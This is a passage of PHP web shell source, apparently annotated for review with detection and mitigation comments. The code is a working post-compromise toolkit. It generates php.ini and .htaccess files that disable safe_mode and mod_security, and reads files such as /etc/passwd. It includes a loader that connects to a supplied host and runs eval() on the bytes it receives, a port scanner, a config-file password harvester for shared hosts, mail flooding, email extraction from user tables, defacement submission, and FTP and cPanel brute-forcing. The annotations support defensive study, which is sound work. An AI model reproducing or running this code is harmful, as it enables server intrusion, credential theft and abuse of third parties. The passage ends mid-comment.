  # Detection: php.ini, ini.php or .htaccess files appearing in the document root with the contents shown below.
  # Mitigation: do not honour per-directory php.ini files, restrict AllowOverride, and load security modules in a way
  # that .htaccess cannot switch off.
  # Branch 1: a local php.ini that turns off safe_mode, clears disable_functions and removes open_basedir.
  1269. else if($_POST['phpiniGenerate'])
  1270. {
  1271. GenerateFile("php.ini","
  1272. safe_mode = Off
  1273. disable_functions = NONE
  1274. safe_mode_gid = OFF
  1275. open_basedir = OFF");
  1276. echo "php.ini Has Been Generated Successfully";
  1277. }
  # Branch 2: an .htaccess that switches off the SecFilter* directives inside an IfModule mod_security.c block
  # and points PHPRC / suPHP_ConfigPath at a php.ini path built from the current working directory.
  1278. else if($_POST['htaccessGenerate'])
  1279. {
  1280. GenerateFile(".htaccess","
  1281. <IfModule mod_security.c>
  1282. SecFilterEngine Off
  1283. SecFilterScanPOST Off
  1284. SecFilterCheckURLEncoding Off
  1285. SecFilterCheckCookieFormat Off
  1286. SecFilterCheckUnicodeEncoding Off
  1287. SecFilterNormalizeCookies Off
  1288. </IfModule>
  1289. SetEnv PHPRC ".getcwd()."php.ini
  1290. suPHP_ConfigPath ".getcwd()."php.ini
  1291. ");
  1292. echo ".htaccess Has Been Generated Successfully ";
  1293. }
  # Branch 3: an ini.php file containing ini_restore() calls for safe_mode and open_basedir.
  1294. else if($_POST['iniphpGenerate'])
  1295. {
  1296. GenerateFile("ini.php","
  1297. ini_restore(\"safe_mode\");
  1298. ini_restore(\"open_basedir\");
  1299. ");
  1300. echo "ini.php Has Been Generated Successfully";
  1301. }
  1302. # --------------------------
  1303. # Reading Files
  1304. #---------------------------
  1305. else if($_POST['read'] || $_POST['show'])
  1306. {
  1307. $file = $_POST['file'];
  1308. $file = str_replace('\\\\','\\',$file);
  1309.  
  1310. if($_POST['read'])
  1311. {
  1312. $openMyFile = fopen($file,'r');
  1313. if(function_exists('fread'))
  1314. {
  1315. echo fread($openMyFile,100000);
  1316. }
  1317. elseif(function_exists('fgets'))
  1318. {
  1319. echo fgets($openMyFile);
  1320. }
  1321. elseif(function_exists('readfile'))
  1322. {
  1323. echo readfile($openMyFile);
  1324. }
  1325. elseif(function_exists('file_get_contents'))
  1326. {
  1327. $readMyFile = @file_get_contents($file, NULL, NULL, 0, 1000000);
  1328. var_dump($readMyFile);
  1329. }
  1330. elseif(function_exists('file'))
  1331. {
  1332. $readMyFile = file($myFile);
  1333. foreach ($readMyFile as $line_num => $readMyFileLine)
  1334. {
  1335. echo "Line #$line_num : " . $readMyFileLine . "
  1336. ";
  1337. }
  1338. }
  1339. elseif(Exe("'cat ".$file."'"))
  1340. {
  1341. echo Exe("'cat ".$file."'");
  1342. }
  1343. elseif(function_exists('readfile'))
  1344. {
  1345. readfile($file);
  1346. }
  1347. elseif(function_exists('include'))
  1348. {
  1349. include($file);
  1350. }
  1351. elseif(function_exists('copy'))
  1352. {
  1353. $tmp=tempnam('','cx');
  1354. copy('compress.zlib://'.$file,$tmp);
  1355. $fh=fopen($tmp,'r');
  1356. $data=fread($fh,filesize($tmp));
  1357. fclose($fh);
  1358. echo $data;
  1359. }
  1360. elseif(function_exists('mb_send_mail'))
  1361. {
  1362. if(file_exists('/tmp/mb_send_mail'))
  1363. {
  1364. unlink('/tmp/mb_send_mail');
  1365. }
  1366. @mb_send_mail(NULL, NULL, NULL, NULL,'-C $file -X /tmp/mb_send_mail');
  1367. @readfile('/tmp/mb_send_mail');
  1368. }
  1369. else if(function_exists('curl_init'))
  1370. {
  1371. $fh=curl_init('file://'.$file.'');
  1372. $tmp=curl_exec($fh);
  1373. echo $tmp;
  1374. if(strstr($file,DIRECTORY_SEPARATOR))
  1375. $ch=curl_init('file:///'.$file."\x00/../../../../../../../../../../../../".__FILE__);
  1376. else $ch=curl_init('file://'.$file."\x00".__FILE__);
  1377. var_dump(curl_exec($ch));
  1378. }
  1379. else if(is_writable('.'))
  1380. {
  1381. file_put_contents('php.ini','safe_mode = Off');
  1382. readfile($file);
  1383. unlink('php.ini');
  1384. }
  1385. else if(is_object($ws=new COM('WScript.Shell')))
  1386. {
  1387. echo $exec=comshelL("type \"$file\"",$ws);
  1388. }
  1389. else if(checkfunctioN('win_shell_execute'))
  1390. {
  1391. echo winshelL("type \"$file\"");
  1392. }
  1393. else if(checkfunctioN('win32_create_service'))
  1394. {
  1395. echo srvshelL("type \"$file\"");
  1396. }
  1397. else if(function_exists('imap_open'))
  1398. {
  1399. $str=imap_open('/etc/passwd','','');
  1400. $list=imap_list($str,$file,'*');
  1401. for($i=0;$i<count($list);$i++)
  1402. {
  1403. echo $list[$i]."\n";
  1404. }
  1405. imap_close($str);
  1406. $str=imap_open($file,'','');
  1407. $tmp=imap_body($str,1);
  1408. echo $tmp;
  1409. imap_close($str);
  1410. }
  1411. elseif($file == '/etc/passwd')
  1412. {
  1413. for($uid=0;$uid<99999;$uid++)
  1414. {
  1415. $h=posix_getpwuid($uid);
  1416. if(!empty($h))
  1417. foreach($h as $v)
  1418. echo "$v:";
  1419. echo "\r\n";
  1420. }
  1421. }
  1422. fclose($openMyFile);
  1423. }
  1424. elseif($_POST['show'])
  1425. {
  1426. $con=glob("$file*");
  1427. foreach ($con as $v)
  1428. {
  1429. echo "$v\n";
  1430. }
  1431. if(function_exists('imap_open'))
  1432. {
  1433. $str=imap_open('/etc/passwd','','');
  1434. $s=explode("|",$file);
  1435. if(count($s)>1)
  1436. {
  1437. $list=imap_list($str,trim($s[0]),trim($s[1]));
  1438. }
  1439. else
  1440. {
  1441. $list=imap_list($str,trim($str[0]),'*');
  1442. }
  1443. for($i=0;$i<count($list);$i++)
  1444. {
  1445. imap_close($str);
  1446. }
  1447. }
  1448. else if(is_object($ws=new COM('WScript.Shell')))
  1449. {
  1450. $exec=comshelL("dir \"$file\"",$ws);
  1451. $exec=str_replace("\t",'',$exec);
  1452. echo $exec;
  1453. }
  1454. else if(checkfunctioN('win_shell_execute'))
  1455. {
  1456. echo winshelL("dir \"$file\"");
  1457. }
  1458. else if(checkfunctioN('win32_create_service'))
  1459. {
  1460. echo srvshelL("dir \"$file\"");
  1461. }
  1462. }
  1463.  
  1464. }
  1465. # --------------------------
  1466. # Encryption
  1467. #---------------------------
  # NOTE(review): Encoding/hash utility. Prints several digests and encodings of the ENCRYPTION POST field.
  # Nothing here is encryption in the cryptographic sense: MD5, MD4, SHA-1 and CRC32 are unkeyed digests/checksums
  # and Base64/URL encoding are reversible encodings.
  1468. elseif($_POST['encryptNow'])
  1469. {
  1470. if(!empty($_POST['ENCRYPTION']))
  1471. {
  # The variable is named $md5 but holds the raw input string, not a hash.
  1472. $md5 = $_POST['ENCRYPTION'];
  # str_hex() is defined outside this excerpt; it is used here for the "URL Decoding" row - behaviour not verifiable here.
  # crypt() is called without a salt argument. All output is echoed without HTML escaping.
  1473. echo "
  1474. MD5 : ".md5($md5)."
  1475. Base64 Encode : ".base64_encode($md5)."
  1476. Base64 Decode : ".base64_decode($md5)."
  1477. Crypt : ".crypt($md5)."
  1478. SHA1 : ".sha1($md5)."
  1479. MD4 : ".hash("md4",$md5)."
  1480. SHA256 : ".hash("sha256",$md5)."
  1481. URL Encoding : ".urlencode($md5)."
  1482. URL Decoding : ".str_hex($md5)."
  1483. CRC32 : ".crc32($md5)."
  1484. Length : ".strlen($md5)."";
  1485. }
  1486. else
  1487. {
  1488. echo "Please Put At Least One Char !";
  1489. }
  1490. }
  1491. # --------------------------
  1492. # Metasploit RC
  1493. #---------------------------
  # NOTE(review): Outbound staged-payload loader. The web server opens a TCP connection to an address and port taken
  # from the request, reads a 4-byte length prefix followed by that many bytes, and passes the received bytes to eval().
  # Whatever the remote end sends therefore runs as PHP inside the web-server process.
  # Detection: PHP/web-server workers initiating outbound TCP connections to arbitrary hosts and ports; a request that
  # stays open for the lifetime of that connection; POST bodies with the field names metaConnect, ip and port.
  # Mitigation: default-deny egress filtering for web workers, and disabling the socket functions that are not needed.
  1494. else if($_POST['metaConnect'])
  1495. {
  1496. $ip = $_POST['ip'];
  1497. $port = $_POST['port'];
  # The message is shown only when both fields are empty.
  1498. if ($ip == "" && $port == "")
  1499. {
  1500. echo "Please fill IP Adress & The listen Port";
  1501. }
  1502. else
  1503. {
  1504. $ipaddr = $ip;
  1505. $port = $port;
  # An address containing ':' is wrapped in brackets, the URI form for IPv6 literals.
  1506. if (FALSE !== strpos($ipaddr, ":"))
  1507. {
  1508. $ipaddr = "[". $ipaddr ."]";
  1509. }
  # Three socket APIs are tried in turn, so disabling only one of them does not stop this branch.
  1510. if (is_callable('stream_socket_client'))
  1511. {
  1512. $msgsock = @stream_socket_client("tcp://{$ipaddr}:{$port}");
  1513. if (!$msgsock)
  1514. {
  1515. die();
  1516. }
  1517. $msgsock_type = 'stream';
  1518. }
  1519. elseif (is_callable('fsockopen'))
  1520. {
  1521. $msgsock = fsockopen($ipaddr,$port);
  1522. if (!$msgsock)
  1523. {
  1524. die();
  1525. }
  1526. $msgsock_type = 'stream';
  1527. }
  1528. elseif (is_callable('socket_create'))
  1529. {
  1530. $msgsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
  1531. $res = socket_connect($msgsock, $ipaddr, $port);
  1532. if (!$res)
  1533. {
  1534. die();
  1535. }
  1536. $msgsock_type = 'socket';
  1537. }
  1538. else
  1539. {
  1540. die();
  1541. }
  # Every failure path calls die() with no output, so a failed attempt leaves an empty response body.
  1542. switch ($msgsock_type)
  1543. {
  1544. case 'stream': $len = fread($msgsock, 4); break;
  1545. case 'socket': $len = socket_read($msgsock, 4); break;
  1546. }
  1547. if (!$len)
  1548. {
  1549. die();
  1550. }
  # "N" unpacks an unsigned 32-bit big-endian integer: the length of the data that follows.
  1551. $a = unpack("Nlen", $len);
  1552. $len = $a['len'];
  1553. $buffer = '';
  # Reads until the announced number of bytes has arrived; the length is taken from the peer without any bound.
  1554. while (strlen($buffer) < $len)
  1555. {
  1556. switch ($msgsock_type)
  1557. {
  1558. case 'stream': $buffer .= fread($msgsock, $len-strlen($buffer));
  1559. break;
  1560. case 'socket': $buffer .= socket_read($msgsock, $len-strlen($buffer));
  1561. break;
  1562. }
  1563. }
  # The received bytes are executed as PHP; nothing about the peer or the data is verified.
  1564. eval($buffer);
  1565. echo "[*] Connection Terminated";
  1566. die();
  1567. }
  1568. }
  1569. # --------------------------
  1570. # Scan Ports
  1571. #---------------------------
  # NOTE(review): TCP connect scan launched from the compromised web server against a host named in the request.
  # Ports 0 through 1023 are tried one after another with a 10-second timeout each.
  # Detection: a web-server process making sequential outbound connection attempts to many ports on one destination;
  # the scan appears to originate from the victim server, not from the operator.
  # Mitigation: egress filtering for web workers limits both this and the use of the host as a pivot.
  1572. else if($_POST['submitDomainToScanPort'])
  1573. {
  1574. $domainToScan = $_POST['domainToScanPort'];
  1575. if(!$domainToScan)
  1576. {
  1577. echo "[-] Enter IP Address Or Domain To Scan";
  1578. }
  1579. else
  1580. {
  1581. for($i=0;$i<1024;$i++)
  1582. {
  # '@' hides connection warnings; a truthy handle is reported as "open".
  1583. $fp = @fsockopen($domainToScan,$i,$errno,$errstr,10);
  1584. if($fp)
  1585. {
  1586. echo "[+] port " . $i . " open on " . $domainToScan . "
  1587. ";
  1588. }
  1589. else
  1590. {
  1591. echo "[+] port " . $i . " closed on " . $domainToScan . "
  1592. ";
  1593. }
  # Output is flushed per port, so results stream back while the request is still running.
  1594. flush();
  1595. }
  # Only the handle from the final iteration is closed here.
  1596. fclose($fp);
  1597. }
  1598. }
  1599.  
  1600. if (isset($_POST["submit_lol"]))
  1601. {
  1602. set_time_limit(0);
  1603. $url = $_POST['hash_lol'];
  1604. echo "Testing ".$url."\n";
  1605. $extention = $_POST['extention'];
  1606. $adminlocales = array(
  1607. "admin/",
  1608. "wp-admin/",
  1609. "administration/",
  1610. "administrator/",
  1611. "moderator/",
  1612. "webadmin/",
  1613. "adminarea/",
  1614. "bb-admin/",
  1615. "adminLogin/",
  1616. "admin_area/",
  1617. "panel-administracion/",
  1618. "instadmin/",
  1619. "memberadmin/",
  1620. "administratorlogin/",
  1621. "adm/",
  1622. "siteadmin/login".$extention."",
  1623. "admin/account".$extention."",
  1624. "admin/index".$extention."",
  1625. "admin/login".$extention."",
  1626. "admin/admin".$extention."",
  1627. "admin_area/login".$extention."",
  1628. "admin_area/index".$extention."",
  1629. "admincp/index".$extention."",
  1630. "adminpanel".$extention."",
  1631. "webadmin".$extention."",
  1632. "webadmin/index".$extention."",
  1633. "webadmin/login".$extention."",
  1634. "admin/admin_login".$extention."",
  1635. "admin_login".$extention."",
  1636. "panel-administracion/login".$extention."",
  1637. "admin_area/admin".$extention."",
  1638. "bb-admin/index".$extention."",
  1639. "bb-admin/login".$extention."",
  1640. "bb-admin/admin".$extention."",
  1641. "admin/home".$extention."",
  1642. "pages/admin/admin-login".$extention."",
  1643. "admin/admin-login".$extention."",
  1644. "admin-login".$extention."",
  1645. "admin/adminLogin".$extention."",
  1646. "home".$extention."",
  1647. "adminarea/index".$extention."",
  1648. "admin/controlpanel".$extention."",
  1649. "admin".$extention."",
  1650. "admin/cp".$extention."",
  1651. "cp".$extention."",
  1652. "adminpanel.php",
  1653. "moderator".$extention."",
  1654. "administrator/index".$extention."",
  1655. "administrator/login".$extention."",
  1656. "user".$extention."",
  1657. "administrator/account".$extention."",
  1658. "administrator".$extention."",
  1659. "login".$extention."",
  1660. "modelsearch/login".$extention."",
  1661. "moderator/login".$extention."",
  1662. "panel-administracion/admin".$extention."",
  1663. "admincontrol/login".$extention."",
  1664. "adm/index".$extention."",
  1665. "moderator/admin".$extention."",
  1666. "account".$extention."",
  1667. "controlpanel".$extention."",
  1668. "admincontrol".$extention."",
  1669. "webadmin/admin".$extention."",
  1670. "adminLogin".$extention."",
  1671. "panel-administracion/login".$extention."",
  1672. "wp-login".$extention."",
  1673. "adminLogin".$extention."",
  1674. "admin/adminLogin".$extention."",
  1675. "adminarea/index".$extention."",
  1676. "adminarea/admin".$extention."",
  1677. "adminarea/login".$extention."",
  1678. "panel-administracion/index".$extention."",
  1679. "modelsearch/index".$extention."",
  1680. "modelsearch/admin".$extention."",
  1681. "adm/admloginuser".$extention."",
  1682. "admloginuser".$extention."",
  1683. "admin2".$extention."",
  1684. "admin2/login".$extention."",
  1685. "admin2/index".$extention."",
  1686. "adm/index".$extention."",
  1687. "adm".$extention."",
  1688. "affiliate".$extention."",
  1689. "adm_auth".$extention."",
  1690. "memberadmin".$extention."",
  1691. "administratorlogin".$extention."");
  1692. foreach ($adminlocales as $admin)
  1693. {
  1694. $headers = @get_headers("$url$admin");
  1695. if (@eregi('200', $headers[0]))
  1696. {
  1697. echo "[+] $url$admin ~ Found!\n";
  1698. }
  1699.  
  1700. }
  1701. }
  1702. # --------------------------
  1703. # Config Finder
  1704. #---------------------------
  # NOTE(review): Shared-hosting credential harvesting. Reads /etc/passwd, derives /home/<user>/public_html/ for each
  # account, keeps the directories the web-server user can read, and hands each one to read_dir() (defined outside this
  # excerpt; the progress message says it searches config.* files for passwords - confirm against its definition).
  # Detection: one PHP process walking many accounts' public_html trees in a short time.
  # Mitigation: per-account isolation (separate users, home directories not readable by other accounts, open_basedir)
  # so that one compromised site cannot read its neighbours' configuration files.
  1705. else if($_POST['configFinderSubmit'])
  1706. {
  1707. set_time_limit(0);
  1708. $passwd=fopen('/etc/passwd','r');
  1709. if (!$passwd)
  1710. {
  1711. echo "[-] Error : coudn't read /etc/passwd";
  1712. exit;
  1713. }
  1714. $path_to_public=array();
  1715. $users=array();
  1716. $pathtoconf=array();
  1717. $i=0;
  1718. while(!feof($passwd))
  1719. {
  1720. $str=fgets($passwd);
  # Lines with index 0 to 35 are skipped; presumably to pass over system accounts - the cut-off is a fixed guess.
  1721. if ($i>35)
  1722. {
  # The user name is the text before the first ':' of the passwd line.
  1723. $pos=strpos($str,":");
  1724. $username=substr($str,0,$pos);
  1725. $dirz="/home/$username/public_html/";
  1726. if (($username!=""))
  1727. {
  1728. if (is_readable($dirz))
  1729. {
  1730. array_push($users,$username);
  1731. array_push($path_to_public,$dirz);
  1732. }
  1733. }
  1734. }
  1735. $i++;
  1736. }
  1737. echo "";
  # Both counters are filled together above, so the two numbers printed are always equal.
  1738. echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd
  1739. ";
  1740. echo "[+] Founded ".sizeof($path_to_public)." readable public_html directories
  1741. ";
  1742. echo "[~] Searching for passwords in config.* files...
  1743. ";
  1744. foreach ($users as $user)
  1745. {
  1746. $path="/home/$user/public_html/";
  1747. read_dir($path,$user);
  1748. }
  1749. echo "[+] Done";
  1750. }
  1751. # --------------------------
  1752. # Mail Storm
  1753. #---------------------------
  # NOTE(review): Mail flooding through the host's own mail() transport. Sends the same body to one recipient a
  # client-chosen number of times, each with a random numeric sender at the literal domain "Attacker.com" and the
  # MD5 of that sender as subject.
  # Impact for the host owner: outbound abuse originates from the server's IP and can get it blocklisted.
  # Detection: bursts of mail submitted by the web-server user; From addresses of the form <digits>@Attacker.com;
  # 32-hex-character subjects. Enabling mail.add_x_header and mail.log in php.ini identifies the sending script.
  # Mitigation: rate-limit or disable mail() for web workers that do not need it.
  1754. else if($_POST['sendMailStorm'])
  1755. {
  1756. $to=$_POST['to'];
  1757. $nom=$_POST['nom'];
  1758. $Comments=$_POST['Comments'];
  1759. if ($to <> "" )
  1760. {
  # $nom is used as the loop bound exactly as received; there is no upper limit.
  1761. for ($i = 0; $i < $nom ; $i++)
  1762. {
  1763. $from = rand (71,1020000000)."@"."Attacker.com";
  1764. $subject= md5("$from");
  # Recipient and body are passed to mail() unvalidated; '@' hides transport warnings.
  1765. if(@mail($to,$subject,$Comments,"From:$from"))
  1766. echo "[+] $i spammed !!
  1767. ";
  1768. else
  1769. {
  1770. echo "[-] $i Failed !!
  1771. ";
  1772. }
  1773. }
  1774. }
  1775. }
  1776. # --------------------------
  1777. # Extract Emails
  1778. #---------------------------
  # NOTE(review): Bulk export of one column from a database table, using connection details supplied in the request
  # (typically credentials recovered from a site's configuration file). The accompanying help text shows the intended
  # targets are the e-mail columns of common forum and CMS user tables.
  # Detection: database logins from the web host followed by unfiltered "SELECT * FROM <user table>" queries;
  # unusually large responses from a PHP script.
  # Mitigation: least-privilege database accounts per application and rotation of credentials after any web compromise.
  1779. else if($_POST['getEmails'])
  1780. {
  1781. $emhost = $_POST['EM_HOST'];
  1782. $emuser = $_POST['EM_USER'];
  1783. $empass = $_POST['EM_PASS'];
  1784. $emdb = $_POST['EM_DB'];
  1785. $emtab = $_POST['EM_TABLE'];
  1786. $emcol = $_POST['EM_COLUMN'];
  # Uses the legacy mysql_* extension, which was removed in PHP 7; on such hosts these calls fail.
  1787. $try2Connect = @mysql_connect($emhost,$emuser,$empass);
  1788. if(!$try2Connect)
  1789. {
  1790. echo "[-] Can't Connect To DB !! [ user name || password is wrong ! ] .
  1791. ";
  1792. }
  # Execution continues after a failed connection; the later calls are silenced with '@'.
  1793. $try2Select = @mysql_select_db($emdb);
  1794. if(!$try2Select && $try2Connect)
  1795. {
  1796. echo "[-] DB Name is Wrong !! . ";
  1797. }
  # The table name is interpolated into the statement as received.
  1798. $sql = @mysql_query("SELECT * FROM $emtab");
  1799. while ($res = @mysql_fetch_array($sql))
  1800. {
  # Only the requested column is printed, one value per row, without escaping.
  1801. echo ''.$res["$emcol"].'
  1802. ';
  1803. }
  1804. }
  1805. // Help
  1806. else if($_POST['emailExtractorHelp'])
  1807. {
  1808. echo "This is Some Tables Name & Columns Name For Some Fam Scripts ..
  1809.  
  1810. [+] VBulletin
  1811. Table-name : user
  1812. column-name : email
  1813.  
  1814. [+] WordPress
  1815. Table-name : wp_users
  1816. column-name : user_email
  1817.  
  1818. [+] Joomla
  1819. Table-name : jos_users
  1820. column-name : email
  1821.  
  1822. [+] PHPBB
  1823. Table-name : phpbb_users
  1824. column-name : user_email
  1825.  
  1826. [+] I.P.Board
  1827. Table-name : ibf_members
  1828. column-name : email
  1829.  
  1830. [+] SMF
  1831. Table-name : smf_members
  1832. column-name : emailAddress ";
  1833. }
  1834. # --------------------------
  1835. # MySQL Query
  1836. #---------------------------
  # NOTE(review): Arbitrary SQL execution against a database chosen in the request. Host, user, password, database
  # and the statement itself all come from POST fields; the statement is sent to mysql_query() after backslashes are removed.
  # Detection: database logins from the web host outside the application's normal account, and statements that do not
  # match the application's query patterns.
  # Mitigation: bind the database to trusted clients only, give application accounts least privilege, and rotate
  # credentials that were readable by a compromised web account.
  1837. else if($_POST['MySQLQuery'])
  1838. {
  1839. $qu_host =$_POST['QU_HOST'];
  1840. $qu_user =$_POST['QU_USER'];
  1841. $qu_pass =$_POST['QU_PASS'];
  1842. $qu_db =$_POST['QU_DB'];
  1843. $query =$_POST['QU'];
  # The host defaults to localhost when the field is empty.
  1844. if (empty($_POST['QU_HOST']))
  1845. $qu_host = 'localhost';
  # Removes backslashes, presumably to undo magic_quotes escaping - this is not sanitisation.
  1846. $query = str_replace("\\","",$query);
  1847. if (!empty($_POST['QU']))
  1848. {
  # Legacy mysql_* extension (removed in PHP 7).
  1849. $tryConnection = @mysql_connect($qu_host,$qu_user,$qu_pass);
  1850. if(!$tryConnection)
  1851. {
  1852. echo "[-] Unable TO Connect DATABASE ! Username Or Password Is Wrong !!";
  1853. }
  1854. else
  1855. {
  1856. $selectDB = @mysql_select_db($qu_db);
  1857. if(!$selectDB)
  1858. {
  1859. echo "[-] Database Name Is Wrong !!";
  1860. }
  1861. else
  1862. {
  1863. $qqok1 = mysql_query($query);
  1864. if(!$qqok1)
  1865. {
  1866. echo "[-] Can't Execute The Query";
  1867. }
  1868. }
  1869. }
  1870. @mysql_close();
  1871. }
  # $qqok1 is only assigned on the success path above; update() is defined outside this excerpt and its
  # effect cannot be determined from here.
  1872. if ($qqok1)
  1873. {
  1874. update();
  1875. }
  1876. }
  1877. # --------------------------
  1878. # SQL Reader
  1879. #---------------------------
  # NOTE(review): File read through the database server. Creates a temporary table, loads a server-side file into it
  # with LOAD DATA INFILE, and selects the rows back. The file is read with the database server's privileges, so PHP
  # restrictions such as open_basedir do not apply to it.
  # Detection: LOAD DATA INFILE statements in the query log, temporary tables with names starting with "N" followed by
  # a uniqid() value.
  # Mitigation: do not grant the FILE privilege to application accounts and set secure_file_priv on the server.
  1880. else if ($_POST['sql2Read'])
  1881. {
  1882. $host = $_POST['host'];
  1883. $user = $_POST['user'];
  1884. $pass = $_POST['pass'];
  1885. $db = $_POST['db'];
  1886. $unique = uniqid('N');
  1887. $file = $_POST['file'];
  # Collapses doubled backslashes in the requested path (Windows-style paths).
  1888. $file = str_replace('\\\\','\\',$file);
  # The three statements are built before the connection below is opened.
  1889. $query = array(
  1890. "CREATE TEMPORARY TABLE $unique (file LONGBLOB)",
  1891. "LOAD DATA INFILE '".mysql_real_escape_string($file)."' INTO TABLE $unique",
  1892. "SELECT * FROM $unique"
  1893. );
  # Legacy mysql_* extension (removed in PHP 7); neither result is checked.
  1894. $connect = mysql_connect($host,$user, $pass);
  1895. mysql_select_db($db,$connect);
  1896. foreach($query as $Allqueries)
  1897. {
  1898. $mysqlQuery = mysql_query($Allqueries,$connect);
  # Rows are HTML-escaped on output; the fetch is silenced for the statements that return no result set.
  1899. while($line = @mysql_fetch_row($mysqlQuery))
  1900. echo htmlspecialchars($line[0]);
  1901. echo "\n";
  1902. }
  1903. }
  1904. # --------------------------
  1905. # Edit File
  1906. #---------------------------
  # NOTE(review): Arbitrary file read and overwrite. The first branch prints the contents of any path the web-server
  # user can read; the second writes the ExecutionArea field to any path it can write, via GenerateFile() (defined
  # outside this excerpt; presumably writes the second argument to the named file and returns success - confirm).
  # Detection: file-integrity monitoring on application code and configuration; unexpected modification times on
  # index files and templates.
  # Mitigation: run the PHP worker without write access to code directories.
  1907. else if($_POST['editFileSubmit'])
  1908. {
  1909. $file2Edit = $_POST['editFile'];
  # Contents are echoed without escaping; '@' hides the warning for unreadable paths.
  1910. echo @file_get_contents($file2Edit);
  1911. }
  1912. else if($_POST['saveEditedFile'])
  1913. {
  1914. $fileName = $_POST['file2edit'];
  1915. $newFile = $_POST['ExecutionArea'];
  1916. $trytoGenerate = GenerateFile($fileName,$newFile);
  1917. if($trytoGenerate)
  1918. {
  1919. echo "[+] File Saved !";
  1920. }
  1921. else
  1922. {
  1923. echo "[-] Failed To Save File !!";
  1924. }
  1925. }
  1926. # --------------------------
  1927. # Zone H Attacker
  1928. #---------------------------
  # NOTE(review): Defacement-archive submission. Sends each listed site to the notification URL below through ZoneH()
  # (defined outside this excerpt; the curl check suggests it performs an HTTP request - confirm).
  # For incident response: a listing on such an archive is often the first external sign of a defacement, and the
  # "attacker name" submitted here is an attribution lead. The requests originate from the compromised server.
  # Detection: outbound HTTP from a web worker to zone-h.org/notify/single.
  1929. else if($_POST['SendNowToZoneH'])
  1930. {
  1931. ob_start();
  1932. $sub = @get_loaded_extensions();
  1933. if(!in_array("curl", $sub))
  1934. {
  1935. die('[-] Curl Is Not Supported !! ');
  1936. }
  1937.  
  1938. $hacker = $_POST['defacer'];
  1939. $method = $_POST['hackmode'];
  1940. $neden = $_POST['reason'];
  1941. $site = $_POST['domain'];
  1942.  
  # Form validation only: each failure ends the script with a message.
  1943. if (empty($hacker))
  1944. {
  1945. die ("[-] You Must Fill the Attacker name !");
  1946. }
  1947. elseif($method == "--------SELECT--------")
  1948. {
  1949. die("[-] You Must Select The Method !");
  1950. }
  1951. elseif($neden == "--------SELECT--------")
  1952. {
  1953. die("[-] You Must Select The Reason");
  1954. }
  1955. elseif(empty($site))
  1956. {
  1957. die("[-] You Must Inter the Sites List ! ");
  1958. }
  1959. $i = 0;
  # One site per line; entries that do not start with "http" get an http:// prefix.
  1960. $sites = explode("\n", $site);
  1961. while($i < count($sites))
  1962. {
  1963. if(substr($sites[$i], 0, 4) != "http")
  1964. {
  1965. $sites[$i] = "http://".$sites[$i];
  1966. }
  # The return value of ZoneH() is not inspected, so the status line that follows is printed whether or not
  # the submission was accepted.
  1967. ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
  1968. echo "Site : ".$sites[$i]." Defaced !\n";
  1969. ++$i;
  1970. }
  1971. echo "[+] Sending Sites To Zone-H Has Been Completed Successfully !! ";
  1972. }
  1973. # --------------------------
  1974. # FTP And Cpanle Brute Force Attacker
  1975. #---------------------------
  1976. else if($_POST['BruteForceCpanelAndFTP'])
  1977. {
  1978. $connect_timeout=5;
  1979. set_time_limit(0);
  1980. $submit=$_REQUEST['BruteForceCpanelAndFTP'];
  1981. $users=$_REQUEST['users'];
  1982. $pass=$_REQUEST['passwords'];
  1983. $target=$_REQUEST['target'];
  1984. $cracktype=$_REQUEST['cracktype'];
  1985.  
  1986. if(empty($target))
  1987. {
  1988. $target = "localhost";
  1989. }
  1990.  
  1991. function ftp_check($host,$user,$pass,$timeout)
  1992. {
        # Tests a single username/password pair against ftp://$host with cURL.
        #   $host    target host name or address, placed directly into the URL
        #   $user    candidate user name
        #   $pass    candidate password
        #   $timeout connect timeout in seconds (CURLOPT_CONNECTTIMEOUT)
        # Returns nothing; the outcome is only printed into the page.
        # Detection: on the targeted FTP service this appears as a run of login attempts coming
        # from the address of the host executing this script. Authentication-failure thresholds
        # and alerting on the FTP daemon are the relevant controls.
  1993. $ch = curl_init();
  1994. curl_setopt($ch, CURLOPT_URL, "ftp://$host");
  1995. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1996. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1997. curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
  1998. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  1999. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  2000. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  2001. $data = curl_exec($ch);
        # cURL error 28 is the operation-timed-out code: the script prints a message and exits,
        # which ends the whole request, not just this attempt.
  2002. if ( curl_errno($ch) == 28 )
  2003. {
  2004. print "Error : Connection Timeout Please Check The Target Hostname .";
  2005. exit;
  2006. }
        # Error 0 means the transfer finished without a cURL error; the script reports that as a
        # working pair and writes both values into the response body. Any other error code is
        # ignored without output.
  2007. elseif ( curl_errno($ch) == 0 )
  2008. {
  2009. print "[+] Cracking Success With Username ($user) and Password ($pass)";
  2010. }
  2011. curl_close($ch);
  2012. }
  2013. function cpanel_check($host,$user,$pass,$timeout)
  2014. {
        # Tests a single username/password pair against http://$host:2082 using HTTP Basic auth.
        #   $host    target host name or address, placed directly into the URL
        #   $user    candidate user name
        #   $pass    candidate password
        #   $timeout connect timeout in seconds (CURLOPT_CONNECTTIMEOUT)
        # Returns nothing; the outcome is only printed into the page.
        # The request goes over plain HTTP, so the credentials travel unencrypted.
        # Detection: the target's access log typically shows a burst of authentication failures on
        # port 2082 from a single source address. Login throttling and lockout on the control
        # panel are the relevant controls.
  2015. $ch = curl_init();
  2016. curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
  2017. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2018. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  2019. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  2020. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
        # With CURLOPT_FAILONERROR, an HTTP status of 400 or above is reported as a cURL error.
  2021. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  2022. $data = curl_exec($ch);
        # cURL error 28 (timeout) ends the whole request via exit.
  2023. if ( curl_errno($ch) == 28 )
  2024. {
  2025. print "[-] Connection Timeout Please Check The Target Hostname .";
  2026. exit;
  2027. }
        # Error 0 (no cURL error, i.e. no error status from the server) is reported as a working
